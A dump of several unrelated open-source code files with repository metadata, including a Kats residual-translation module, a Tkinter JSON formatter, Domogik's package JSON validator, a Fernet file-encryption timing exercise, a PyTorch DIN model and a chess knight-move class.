Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> TimeSeriesData:\n \"\"\"\n Predicts the natural-log probability of a residual\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. 
At most one of `ds` and `ts`\n\n Returns:\n A series where there is a probability corresponding to\n each instance (row) in the input.\n \"\"\"\n residual = self._get_residual(y, yhat, yhat_lower, yhat_upper, residual)\n for _ in range(30):\n print(type(residual))\n\n log_proba = pd.DataFrame(\n {\n # pyre-fixme[16]: `KDEResidualTranslator` has no attribute `_kde`.\n \"value\": self._kde.score_samples(residual.value.to_frame()),\n \"time\": residual.time,\n },\n copy=False,\n )\n\n return TimeSeriesData(log_proba)\n\n def _get_residual(\n self,\n y: Optional[TimeSeriesData],\n yhat: Optional[TimeSeriesData],\n yhat_lower: Optional[TimeSeriesData],\n yhat_upper: Optional[TimeSeriesData],\n residual: Optional[TimeSeriesData],\n ) -> TimeSeriesData:\n if yhat is not None:\n if y is None:\n raise ValueError(\"Must include y if supplying yhat\")\n if residual is not None:\n raise ValueError(\"Must not include residuals if supplying yhat\")\n residual = y - yhat\n if (yhat_lower is not None) != (yhat_upper is not None):\n raise ValueError(\n \"Must supply either both yhat_lower and yhat_upper\" \"or neither\"\n )\n if yhat_lower is not None:\n assert yhat_upper is not None\n assert yhat_lower is not None\n residual /= yhat_upper - yhat_lower\n elif residual is not None:\n if any(c is not None for c in [y, yhat, yhat_lower, yhat_upper]):\n raise ValueError(\n \"Must not include y, yhat, yhat_lower, yhat_upper\"\n \"if supplying residuals\"\n )\n else:\n raise ValueError(\"Must supply y and yhat or residual\")\n\n nulls = residual.value.isnull()\n residual.value = residual.value[~nulls]\n residual.time = residual.time[~nulls]\n return residual\n","repo_name":"facebookresearch/Kats","sub_path":"kats/detectors/residual_translation.py","file_name":"residual_translation.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","stars":4597,"dataset":"github-code","pt":"41"} +{"seq_id":"18953353689","text":"import pytz\nimport datetime\n\nliste1 = ['a', 'b', 'c']\nliste2 = ['c', 'a']\nelem1 = 'c'\nelem2 = 'a'\n\nif elem1 in liste1 and elem2 in liste1:\n print(\"Elem1 et 2 dans liste\")\nelse:\n print(\"Elem1 et 2 pas dans liste\")\n\ntz = pytz.timezone(\"EST\")\nnow = datetime.datetime.now(tz=tz)\nprint(\"Now: %s\" % str(now))\n","repo_name":"dugrema/millegrilles.consignation.python","sub_path":"test/liste_tests.py","file_name":"liste_tests.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17900589730","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nProject :python_prac \nFile :prac_02json格式化小工具.py\nAuthor :张以白\nDate :2023/7/27 2:30\n使用tkinter+json实现格式化json的一个小工具\n\"\"\"\nimport tkinter\nfrom tkinter import *\nimport json\nimport math\nfrom tkinter import ttk\n\n\nclass Application(Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.pack()\n self.creatWidget()\n\n def json_format(self):\n try:\n self.data = self.entry1.get()\n # # 将JSON字符串解析为Python对象\n json_data = json.loads(self.data) #\n # # load从文件中加载 loads是json字符串转成python结构\n # # dump写入文件 dumps是python结构转成json字符串\n\n with open(\"./test.json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(json_data, f, indent=5)\n print(json_data)\n # # json.dump()将Python对象写入文件\n # 创建提示标签\n self.tip_label = Label(self, text=\"已经生成!存放test.json中\")\n self.tip_label.pack()\n except:\n\n self.tip_label = Label(self, text=\"json格式有误!\")\n self.tip_label.pack()\n\n #\n def 
creatWidget(self):\n self.label1 = Label(self, text=\"请输入json数据\")\n self.label1.pack()\n v1 = StringVar()\n self.entry1 = Entry(self, textvariable=v1, width=40)\n v1.set(\"请输入你想格式化的json数据\")\n self.entry1.pack()\n\n self.btn1 = Button(self, text=\"开始转换\")\n # self.btn1.bind(\"\",lambda event: self.turnover())\n self.btn1.bind(\"\", lambda event: [self.json_format()])\n self.btn1.pack()\n\n def nextwedgit(self):\n print(\"调用后的按钮信息\")\n self.label2 = Label(self, text=\"格式化后数据\", width=10, height=1)\n self.label2.pack(side=\"left\")\n\n # 创建一个Frame,用于在文本框和按钮之间创建空间\n spacer_frame = Frame(self)\n spacer_frame.pack(side=\"left\") # 使用padx来增加水平间距\n\n # 文本编辑区\n self.textpad = Text(self)\n self.textpad.pack()\n\n\nif __name__ == '__main__':\n # json_format(data=shujv)\n root = Tk()\n # 设置窗口大小\n window_width = 500\n window_height = 400\n\n # 获取屏幕的宽度和高度\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n\n # 计算窗口在屏幕上的坐标\n x = math.floor((screen_width - window_width) / 2)\n y = math.floor((screen_height - window_height) / 2)\n\n # 设置窗口位置\n root.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n root.title(\"json格式化工具\")\n # 设置窗口背景色彩\n root.configure(bg=\"#F2F2F2\") # 设置背景颜色为浅灰色\n\n app = Application(master=root)\n\n # ��行主循环\n root.mainloop()\n","repo_name":"1490625639/python_prac","sub_path":"prac_18json/prac_02json格式化小工具.py","file_name":"prac_02json格式化小工具.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70935830843","text":"import traceback\nimport datetime\nimport json\nfrom domogik.common.configloader import Loader\nfrom domogik import __version__ as DMG_VERSION\ntry:\n # python3\n from urllib.request import urlopen\nexcept ImportError:\n # python2\n from urllib import urlopen\n\n#TODO : why this import fails ?\n#from domogik.xpl.common.plugin import PACKAGES_DIR\nPACKAGES_DIR = \"domogik_packages\"\n\n\n\n\n\nclass PackageException(Exception):\n \"\"\"\n Package exception\n \"\"\"\n\n def __init__(self, value):\n Exception.__init__(self)\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass PackageJson():\n \"\"\" PackageJson class\n load the file into a json and complete it\n \"\"\"\n def __init__(self, name = None, url = None, path = None, pkg_type = \"plugin\", data = None):\n \"\"\" Read json file of a plugin and make an object from it\n @param name : name of package\n @param url : url of file\n @param path : path of file\n @param pkg_type : package type (default : 'plugin')\n To use only with name != None\n @param data : json data as a python object. 
Used by package.py when installing a zip file : the json is read from memory\n \"\"\"\n json_file = None\n try:\n # get config\n cfg = Loader('domogik')\n config = cfg.load()\n conf = dict(config[1])\n self.resources_dir = \"{0}/resources\".format(conf['libraries_path'])\n # load from sources repository\n if name != None:\n\n if pkg_type in [\"plugin\", \"brain\", \"interface\"]:\n json_file = \"{0}/{1}/{2}_{3}/info.json\".format(conf['libraries_path'], PACKAGES_DIR, pkg_type, name)\n icon_file = \"{0}/{1}/{2}_{3}/design/icon.png\".format(conf['libraries_path'], PACKAGES_DIR, pkg_type, name)\n # TODO : reactivate later\n #elif pkg_type == \"external\":\n # if 'package_path' in conf:\n # json_directory = \"%s/domogik_packages/externals/\" % (conf['package_path'])\n # else:\n # json_directory = \"%s/%s\" % (conf['src_prefix'], \"share/domogik/externals/\")\n else:\n raise PackageException(\"Type '{0}' doesn't exists\".format(pkg_type))\n #json_file = \"{0}/{1}.json\".format(json_directory, name)\n\n self.json = json.load(open(json_file))\n elif path != None:\n json_file = path\n icon_file = None\n self.json = json.load(open(json_file))\n\n elif url != None:\n json_file = url\n icon_file = None\n json_data = urlopen(json_file)\n # TODO : there is an error here!!!!!\n self.json = json.load(xml_data)\n\n elif data != None:\n json_file = None\n icon_file = None\n self.json = data\n\n json_file = \"{0}/datatypes.json\".format(self.resources_dir)\n self._datatypes = None\n try:\n self._datatypes = json.load(open(json_file))\n except:\n raise PackageException(\"Error while reading datatypes json file '{0}'. Error is : {1}\".format(json_file, traceback.format_exc()))\n\n self.validate()\n\n ### complete json\n # identity data\n self.json[\"identity\"][\"package_id\"] = \"{0}-{1}\".format(self.json[\"identity\"][\"type\"],\n self.json[\"identity\"][\"name\"])\n self.json[\"identity\"][\"icon_file\"] = icon_file\n\n if not self.json[\"identity\"].has_key(\"xpl_clients_only\"):\n self.json[\"identity\"][\"xpl_clients_only\"] = False\n\n if not self.json[\"identity\"].has_key(\"compliant_xpl_clients\"):\n self.json[\"identity\"][\"compliant_xpl_clients\"] = []\n\n # common configuration items\n # to add only for a plugin with identity>xpl_clients_only not set to True !\n if self.json[\"identity\"][\"type\"] in [\"plugin\", \"interface\"] and not (self.json[\"identity\"].has_key(\"xpl_clients_only\") and self.json[\"identity\"][\"xpl_clients_only\"] == True):\n auto_startup = {\n \"default\": False,\n \"description\": \"Automatically start the client at Domogik startup\",\n \"key\": \"auto_startup\",\n \"name\" : \"Start the client with Domogik\",\n \"required\": True,\n \"type\": \"boolean\"\n }\n # check that auto_startup key is not already defined in the json\n for config_elt in self.json[\"configuration\"]:\n if config_elt[\"key\"] == \"auto_startup\":\n raise PackageException(\"Configuration parameter 'auto_startup' has not to be defined in the json file. 
Please remove it\")\n self.json[\"configuration\"].insert(0, auto_startup)\n \n\n\n except PackageException as exp:\n raise PackageException(exp.value)\n except:\n raise PackageException(\"Error reading json file : {0} : {1}\".format(json_file, str(traceback.format_exc())))\n\n\n #def cache_xml(self, cache_folder, url, repo_url, priority):\n # \"\"\" Add package url info in xml data\n # Store xml in a file in cache_folder\n # @param cache_folder : folder to put xml file\n # @param url : package url\n # @param repo_url : repository url\n # @param priority : repository priority\n # \"\"\"\n # top_elt = self.xml_content.documentElement\n # new_elt = self.xml_content.createElementNS(None, 'repository')\n # new_elt.setAttribute(\"package\", url)\n # new_elt.setAttribute(\"priority\", priority)\n # new_elt.setAttribute(\"source\", repo_url)\n # top_elt.appendChild(new_elt)\n # cache_file = open(\"{0}/{1}\".format(cache_folder, self.json_filename), \"w\") \n # cache_file.write(self.xml_content.toxml().encode(\"utf-8\"))\n # cache_file.close()\n\n #def set_repo_source(self, source):\n # \"\"\" Add source info in xml data\n # Store in xml the repository from which it comes\n # @param source : repository url\n # \"\"\"\n # top_elt = self.xml_content.documentElement\n # new_elt = self.xml_content.createElementNS(None, 'repository')\n # new_elt.setAttribute(\"source\", source)\n # top_elt.appendChild(new_elt)\n # my_file = open(\"{0}\".format(self.info_file), \"w\") \n # my_file.write(self.xml_content.toxml().encode(\"utf-8\"))\n # my_file.close()\n\n def validate(self):\n if self.json[\"json_version\"] == 2:\n self._validate_02()\n if 'identity' in self.json.keys() and 'domogik_min_version' in self.json['identity']:\n if self.json['identity']['domogik_min_version'] > DMG_VERSION:\n raise PackageException(\"Domogik version check failed! 
min_version={0} current version={1}\".format(self.json['identity']['domogik_min_version'], DMG_VERSION));\n else:\n return False\n\n def _validate_keys(self, expected, name, lst, optional=[]):\n for exp in expected:\n if exp not in lst:\n raise PackageException(\"key '{0}' not found in {1}\".format(exp, name))\n explst = expected + optional\n for item in lst:\n if item not in explst:\n raise PackageException(\"unknown key '{0}' found in {1}\".format(item, name))\n\n def _validate_dataType(self, msg, dataType):\n if dataType not in self._datatypes:\n raise PackageException(msg)\n\n def _validate_02(self):\n fieldTypes = [\"boolean\", \"string\", \"choice\", \"date\", \"time\", \"datetime\", \"float\", \"integer\", \"email\", \"ipv4\", \"ipv6\", \"url\", \"password\"]\n try:\n #check that all main keys are in the file\n expected = [\"configuration\", \"xpl_commands\", \"xpl_stats\", \"commands\", \"sensors\", \"device_types\", \"identity\", \"json_version\"]\n self._validate_keys(expected, \"file\", self.json.keys(), [\"products\", \"external\"])\n\n # validate identity\n expected = [\"author\", \"author_email\", \"description\", \"domogik_min_version\", \"name\", \"type\", \"version\"]\n optional = [\"tags\", \"dependencies\", \"package_id\", \"icon_file\", \"xpl_clients_only\", \"compliant_xpl_clients\"]\n if type(self.json[\"identity\"]) != dict:\n raise PackageException(\"Identity part is NOT a dictionary!\")\n self._validate_keys(expected, \"an identity param\", self.json[\"identity\"].keys(), optional)\n\n # validate configuration\n expected = [\"default\", \"description\", \"key\", \"name\", \"required\", \"type\"]\n optional = [\"sort\", \"max_value\", \"min_value\", \"choices\", \"mask\", \"multiline\"]\n if type(self.json[\"configuration\"]) != list:\n raise PackageException(\"Configuration part is NOT a list!\")\n for conf in self.json[\"configuration\"]:\n self._validate_keys(expected, \"a configuration item param\", conf.keys(), optional)\n if conf['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(conf['type'], fieldTypes))\n\n # validate products\n if 'products' in self.json.keys():\n expected = [\"name\", \"id\", \"documentation\", \"type\"]\n for prod in self.json['products']:\n self._validate_keys(expected, \"a product\", prod.keys())\n\n #validate the device_type\n if type(self.json[\"device_types\"]) != dict:\n raise PackageException(\"Device_types part is NOT a dictionary!\")\n for devtype in self.json[\"device_types\"]:\n devt = self.json[\"device_types\"][devtype]\n expected = ['id', 'name', 'description', 'commands', 'sensors', 'parameters']\n self._validate_keys(expected, \"device_type {0}\".format(devtype), devt.keys())\n #check that all commands exists inisde each device_type\n if type(devt[\"commands\"]) != list:\n raise PackageException(\"Commands list for device_type {0} is NOT a list!\".format(devtype))\n for cmd in devt[\"commands\"]:\n if cmd not in self.json[\"commands\"].keys(): \n raise PackageException(\"cmd {0} defined in device_type {1} is not found\".format(cmd, devtype))\n #check that all sensors exists inside each device type\n if type(devt[\"sensors\"]) != list:\n raise PackageException(\"Sensors list for device_type {0} is NOT a list!\".format(devtype))\n for sens in devt[\"sensors\"]:\n if sens not in self.json[\"sensors\"].keys(): \n raise PackageException(\"sensor {0} defined in device_type {1} is not found\".format(sens, devtype))\n #see that each xplparam inside 
device_type has the following keys: key, description, type\n expected = [\"key\", \"type\", \"description\", \"xpl\"]\n optional = [\"max_value\", \"min_value\", \"choices\", \"mask\", \"multiline\", \"default\"]\n if type(devt[\"parameters\"]) != list:\n raise PackageException(\"Parameters list for device_type {0} is NOT a list!\".format(devtype))\n for par in devt[\"parameters\"]:\n self._validate_keys(expected, \"a param for device_type {0}\".format(devtype), par.keys(), optional)\n if par['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(par['type'], fieldTypes))\n\n #validate the commands\n if type(self.json[\"commands\"]) != dict:\n raise PackageException(\"Commands part is NOT a dictionary!\")\n for cmdid in self.json[\"commands\"]:\n cmd = self.json[\"commands\"][cmdid]\n expected = ['name', 'return_confirmation', 'parameters']\n optional = ['xpl_command']\n self._validate_keys(expected, \"command {0}\".format(cmdid), cmd.keys(), optional)\n # validate the params\n expected = ['key', 'data_type', 'conversion']\n if type(cmd['parameters']) != list:\n raise PackageException(\"Parameters for command {0} is not a list\".format(cmdid))\n for par in cmd['parameters']:\n self._validate_keys(expected, \"a param for command {0}\".format(cmdid), par.keys())\n self._validate_dataType(\"DataType in command {0} is not valid\".format(cmdid), par['data_type'])\n # see that the xpl_command is defined\n if \"xpl_command\" in cmd and cmd[\"xpl_command\"] not in self.json[\"xpl_commands\"].keys():\n raise PackageException(\"xpl_command {0} defined in command {1} is not found\".format(cmd[\"xpl_command\"], cmdid))\n\n #validate the sensors\n if type(self.json[\"sensors\"]) != dict:\n raise PackageException(\"Sensor part is NOT a dictionary!\")\n for senid in self.json[\"sensors\"]:\n sens = self.json[\"sensors\"][senid]\n expected = ['name', 'data_type', 'conversion', 'history', 'incremental', 'timeout']\n hexpected = ['store', 'max', 'expire', 'round_value', 'duplicate']\n self._validate_keys(expected, \"sensor {0}\".format(senid), list(sens.keys()))\n self._validate_keys(hexpected, \"sensor {0} history\".format(senid), list(sens['history'].keys()))\n self._validate_dataType(\"DataType in sensor {0} is not valid\".format(senid), sens['data_type'])\n\n #validate the xpl command\n if type(self.json[\"xpl_commands\"]) != dict:\n raise PackageException(\"Xpl_commands part is NOT a dictionary!\")\n for xcmdid in self.json[\"xpl_commands\"]:\n xcmd = self.json[\"xpl_commands\"][xcmdid]\n expected = [\"name\", \"schema\", \"xplstat_name\", \"parameters\"]\n self._validate_keys(expected, \"xpl_command {0}\".format(xcmdid), xcmd.keys())\n # parameters\n expected = [\"static\", \"device\"]\n self._validate_keys(expected, \"parameters for xpl_command {0}\".format(xcmdid), xcmd['parameters'].keys())\n # static parameter\n expected = [\"key\", \"value\"]\n if type(xcmd['parameters']['static']) != list:\n raise PackageException(\"Static parameters for xpl_command {0} is not a list\".format(xcmdid))\n for stat in xcmd['parameters']['static']:\n self._validate_keys(expected, \"a static parameter for xpl_command {0}\".format(xcmdid), stat.keys())\n # device parameter\n expected = [\"key\", \"description\", \"type\"]\n optional = [\"default\"]\n if type(xcmd['parameters']['device']) != list:\n raise PackageException(\"Device parameters for xpl_command {0} is not a list\".format(xcmdid))\n for stat in xcmd['parameters']['device']:\n 
self._validate_keys(expected, \"a device parameter for xpl_command {0}\".format(xcmdid), stat.keys(), optional)\n if stat['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(stat['type'], fieldTypes))\n # see that the xpl_stat is defined\n if xcmd[\"xplstat_name\"] not in self.json[\"xpl_stats\"].keys():\n raise PackageException(\"xplstat_name {0} defined in xpl_command {1} is not found\".format(xcmd[\"xplstat_name\"], xcmdid))\n\n #validate the xpl stats\n if type(self.json[\"xpl_stats\"]) != dict:\n raise PackageException(\"Xpl_stats part is NOT a dictionary!\")\n for xstatid in self.json[\"xpl_stats\"]:\n xstat = self.json[\"xpl_stats\"][xstatid]\n expected = [\"name\", \"schema\", \"parameters\"]\n self._validate_keys(expected, \"xpl_command {0}\".format(xstatid), xstat.keys())\n # parameters\n expected = [\"static\", \"device\", \"dynamic\"]\n self._validate_keys(expected, \"parameters for xpl_stat {0}\".format(xstatid), xstat['parameters'].keys())\n # static parameter\n expected = [\"key\", \"value\"]\n if type(xstat['parameters']['static']) != list:\n raise PackageException(\"Static parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['static']:\n self._validate_keys(expected, \"a static parameter for xpl_stat {0}\".format(xstatid), stat.keys())\n # device parameter\n expected = [\"key\", \"description\", \"type\"]\n optional = [\"default\", \"multiple\"]\n if type(xstat['parameters']['device']) != list:\n raise PackageException(\"Device parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['device']:\n self._validate_keys(expected, \"a device parameter for xpl_stat {0}\".format(xstatid), stat.keys(), optional)\n if stat['type'] not in fieldTypes:\n raise PackageException(\"Type ({0}) in a config item is not in the allowed list: {1}\".format(stat['type'], fieldTypes))\n # dynamic parameter\n expected = [\"key\", \"sensor\"]\n opt = [\"ignore_values\"]\n if type(xstat['parameters']['dynamic']) != list:\n raise PackageException(\"Dynamic parameters for xpl_stat {0} is not a list\".format(xstatid))\n for stat in xstat['parameters']['dynamic']:\n self._validate_keys(expected, \"a dynamic parameter for xpl_stat {0}\".format(xstatid), stat.keys(), opt)\n # check that the sensor exists\n if stat['sensor'] not in self.json[\"sensors\"].keys(): \n raise PackageException(\"sensor {0} defined in xpl_stat {1} is not found\".format(stat['sensor'], xstatid))\n except PackageException as exp:\n raise PackageException(\"Error validating the json: {0}\".format(exp.value))\n\n def set_generated(self, path):\n \"\"\" Add generation date info in json data\n @param path : path to json file\n \"\"\"\n my_json = json.load(open(path))\n my_json[\"identity\"][\"generated\"] = str(datetime.datetime.now())\n my_file = open(path, \"w\")\n my_file.write(json.dumps(my_json))\n my_file.close()\n\n def get_json(self):\n \"\"\" Return the json data\n \"\"\"\n return self.json\n\n def display(self):\n \"\"\" Display xml data in a fine way\n \"\"\"\n print(u\"---- Package informations -------------------------------\")\n print(u\"Type : {0}\".format(self.json[\"identity\"][\"type\"]))\n print(u\"Name : {0}\".format(self.json[\"identity\"][\"name\"]))\n print(u\"Package id : {0}\".format(self.json[\"identity\"][\"package_id\"]))\n print(u\"Version : {0}\".format(self.json[\"identity\"][\"version\"]))\n print(u\"Tags : 
{0}\".format(self.json[\"identity\"][\"tags\"]))\n print(u\"Link for doc : {0}\".format(self.json[\"identity\"][\"documentation\"]))\n print(u\"Description : {0}\".format(self.json[\"identity\"][\"description\"]))\n print(u\"Changelog : {0}\".format(self.json[\"identity\"][\"changelog\"]))\n print(u\"Author : {0}\".format(self.json[\"identity\"][\"author\"]))\n print(u\"Author's email : {0}\".format(self.json[\"identity\"][\"author_email\"]))\n print(u\"Domogik min version : {0}\".format(self.json[\"identity\"][\"domogik_min_version\"]))\n print(u\"---------------------------------------------------------\")\n\n def find_xplstats_for_device_type(self, devtype):\n if self.json[\"json_version\"] != 2:\n return \"Bad json version for the plugin\"\n ret = {}\n # loop over all xplstat params and see if the sensor is linked to the above list\n for xstatid in self.json[\"xpl_stats\"]:\n xstat = self.json[\"xpl_stats\"][xstatid]\n for stat in xstat['parameters']['dynamic']:\n if stat['sensor'] in self.json[\"device_types\"][devtype]['sensors']:\n if stat['sensor'] not in ret:\n ret[stat['sensor']] = []\n ret[stat['sensor']].append( xstatid )\n \n return ret\n\n\ndef set_nightly_version(path):\n \"\"\" update version for the nightly build\n @param path : path to json file\n \"\"\"\n my_json = json.load(open(path))\n # suffix the version with .devYYYYMMDD\n suffix = \".dev{0}\".format(datetime.datetime.now().strftime('%Y%m%d'))\n my_json[\"identity\"][\"version\"] += suffix\n my_file = open(path, \"w\")\n my_file.write(json.dumps(my_json))\n my_file.close()\n\nif __name__ == \"__main__\":\n pjson = PackageJson(\"plcbus\")\n pjson = PackageJson(\"velbus\")\n","repo_name":"domogik/domogik","sub_path":"src/domogik/common/packagejson.py","file_name":"packagejson.py","file_ext":"py","file_size_in_byte":21598,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"41"} +{"seq_id":"6122610339","text":"# en este codigo implementamos un proceso de cifrado y descifrado de archivos utilizando la biblioteca de criptografia \"cryptography\"\nfrom cryptography.fernet import Fernet\nimport time\n\n\ninicioE2 = time.time()\n#Etapa 2: Generar y/o imprimir la(las) claves de cifrado\n#Escribir y guardar clave\n\n#genera_clave genera una nueva clave de cifrado utilizando la clase fernet \ndef genera_clave():\n \n clave = Fernet.generate_key()\n\n with open(\"clave.key\",\"wb\") as archivo_clave: # la clave se guarda en un archivo llamado clave.key\n archivo_clave.write(clave)\n with open('clave.key','r') as clave_lectura:\n print(\"La clave generada es: \")\n print(clave_lectura.read())\n\n#cargar clave\ndef cargar_clave():\n return open(\"clave.key\",\"rb\").read()\n\n#generar clave\ngenera_clave()\n#cargar clave\nclave = cargar_clave()\nfinE2 = time.time()\n\n\ninicioE1 = time.time()\n\n#Etapa 1: Leer el archivo\n# abre y lee el contenido del archivo .txt utilizando el modo de lectura del texto rt\nnom_archivo= \"10 palabras.txt\"\n\ndef leerArchivo():\n stream = open(\"10 palabras.txt\", \"rt\", encoding=\"utf-8\")\n print(stream.read())\nleerArchivo()\nfinE1 = time.time()\n\n\ninicioE3 = time.time()\n\n#Etapa 3: Cifrar e imprimir el texto cifrado.\n#Encriptar archivo\n\n# la funcion encriptar(nom_archivo,clave) toma el nombre del aarchivo y la clave de cifrado como argumentos\n\ndef encriptar(nom_archivo, clave):\n f = Fernet(clave) # se crea el objeto fernet con la clave proporcionada \n with open(nom_archivo, \"rb\") as file: # el archivo se abre en modo de lectura binaria 
rb y se lee el contenido \n\n # el contenido del archivo se cifra utilizando la clave y se guarda en la misma ubicacion del archivo original\n # se lee y se imprime el contenido del archivo cifrado de la consola\n archivo_info = file.read()\n encrypted_data = f.encrypt(archivo_info)\n with open(nom_archivo,\"wb\") as file:\n file.write(encrypted_data)\n with open(nom_archivo,'rb') as archivo_lectura:\n print(\"El archivo cifrado es: \")\n print(archivo_lectura.read())\n\nencriptar(nom_archivo, clave)\nfinE3 = time.time()\n \n\n\n#DESCENCRIPTAR\ninicioE4 = time.time()\n#Etapa 4: Descifrar e imprimir el texto claro.\n#Desencriptar archivo\n\n# la funcion desencriptar(nom_archivo, clave) toma el nombre del archivo y la clave de cifrado como argumentos \ndef desencriptar(nom_archivo, clave):\n f = Fernet(clave)\n with open(nom_archivo, \"rb\") as file:\n \n # el contenido del archivo se cifra utilizando la clave y se guarda en la misma ubicacion del archivo original\n # se lee y se imprime el contenido del archivo cifrado de la consola\n encrypted_data = file.read()\n desencrypted_data = f.decrypt(encrypted_data)\n with open(nom_archivo,\"wb\") as file:\n file.write(desencrypted_data)\n\n#desencriptar e imprimir\ndesencriptar(nom_archivo, clave)\nwith open(nom_archivo,'rt', encoding=\"utf-8\") as archivo_lectura2:\n print(\"El archivo descifrado es: \")\n print(archivo_lectura2.read())\nfinE4 = time.time()\n\n# finalmente se calcula el tiempo de ejecucion de cada etapa utilizando la funcion time.time() \n# los resultados se imprimen en la consola \n\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E1: \")\nprint(finE1-inicioE1)\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E2: \")\nprint(finE2-inicioE2)\nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E3: \")\nprint(finE3-inicioE3) \nprint(\"-----------------------\")\nprint(\"Tiempo ejecución E4: \")\nprint(finE4-inicioE4)\nprint(\"-----------------------\")","repo_name":"23-23SGRTI/GRUPO02","sub_path":"Simetrico.py","file_name":"Simetrico.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74295845563","text":"from torch import nn\nimport torch\nimport torch.functional as F\nfrom src.attentionSequencePoolingLayer import SequenceAttentionPoolingLayer\nfrom src.layers import FullyConnectedLayer\n\nclass DIN(nn.Module):\n def __init__(self,\n query_dim,\n hist_behavior_dim,\n user_profile_dim,\n hidden_dim_list = [512, 1],\n use_batchnorm=True,\n use_sigmoid = True,\n dropout=0):\n super(DIN, self).__init__()\n\n self.query_dim = query_dim\n self.hist_behavior_dim = hist_behavior_dim\n self.user_profile_dim = user_profile_dim\n self.hidden_dims = hidden_dim_list\n self.sequenceAttentionPoolingLayer= SequenceAttentionPoolingLayer(self.query_dim, self.hist_behavior_dim)\n self.no_hist_embedding = nn.Parameter(torch.randn((self.hist_behavior_dim, )))\n self.concated_dim = self.query_dim + self.hist_behavior_dim + self.user_profile_dim\n self.output_layer = FullyConnectedLayer(self.concated_dim,\n self.hidden_dims,\n sigmoid= use_sigmoid,\n batch_norm= use_batchnorm,\n dropout_rate= dropout)\n\n def forward(self, query_embedding, hist_embedding, hist_length, user_profile_embedding):\n\n # add wide part of model ?\n hist_pooled_embedding = self.sequenceAttentionPoolingLayer(query_embedding, hist_embedding, hist_length)\n # print('number of zero length history %d' %(torch.sum(hist_length == 0), ))\n 
hist_pooled_embedding = torch.where(hist_length == 0, hist_pooled_embedding, self.no_hist_embedding) # amazing shape broadcast\n embed_concated = torch.cat([query_embedding, hist_pooled_embedding, user_profile_embedding], dim= -1)\n\n\n logits = self.output_layer(embed_concated)\n\n return logits\n\n\nif __name__ == '__main__':\n query = torch.randn(3, 200)\n hist_behavior = torch.randn(3, 10, 100)\n hist_length = 8 * torch.ones(3, 1)\n user_profile_embedding = torch.randn(3, 300)\n\n t = DIN(200, 100, 300)\n out = t(query, hist_behavior, hist_length, user_profile_embedding)\n print(out.detach().numpy())","repo_name":"Yindong-Zhang/Zhiyuan-KanshanCup-expertDiscovery","sub_path":"ydzhang/src/DIN.py","file_name":"DIN.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"25854532545","text":"class Knight():\n possibleMoves = []\n moveSet = [\n [-1, -2],\n [-2, -1],\n [-2, +1],\n [-1, +2],\n [+1, -2],\n [+2, -1],\n [+2, +1],\n [+1, +2],\n ]\n def __init__(self, xPosition, yPosition):\n self.possibleMoves = [] # 1\n self.xPosition = xPosition # 1\n self.yPosition = yPosition # 1\n self.findPossibleMoves() # 8\n\n def findPossibleMoves(self):\n for move in self.moveSet: # 8\n newXPos = self.xPosition + move[0]\n newYPos = self.yPosition + move[1]\n if 0 <= newXPos <= 7 and 0 <= newYPos <= 7:\n self.possibleMoves.append([newXPos, newYPos])\n print(\"Possible moves for \" + str(self.xPosition) + \" , \" + str(self.yPosition) + \" : \"\n + str(self.possibleMoves))\n","repo_name":"haystacklab/KnightTravailsPy","sub_path":"app/model/Knight.py","file_name":"Knight.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"710066897","text":"import os\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsetup(\n name='jira-comment-slack',\n version='0.2',\n url='https://github.com/smartxworks/jira-comment-slack',\n license='MIT',\n author='willharris/SmartXWorks/Kisung',\n description='Send JIRA comment updates to a Slack channel',\n long_description=__doc__,\n py_modules=[\"jira_comment_slack\"],\n zip_safe=False,\n include_package_data=True,\n platforms='any',\n install_requires=[\n 'Flask',\n 'requests',\n ],\n entry_points={\n 'console_scripts': [\n 'jira-comment-slack-server = jira_comment_slack:main',\n ],\n },\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","repo_name":"Kisung/jira-comment-slack","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"41"} +{"seq_id":"70453854844","text":"from telebot import 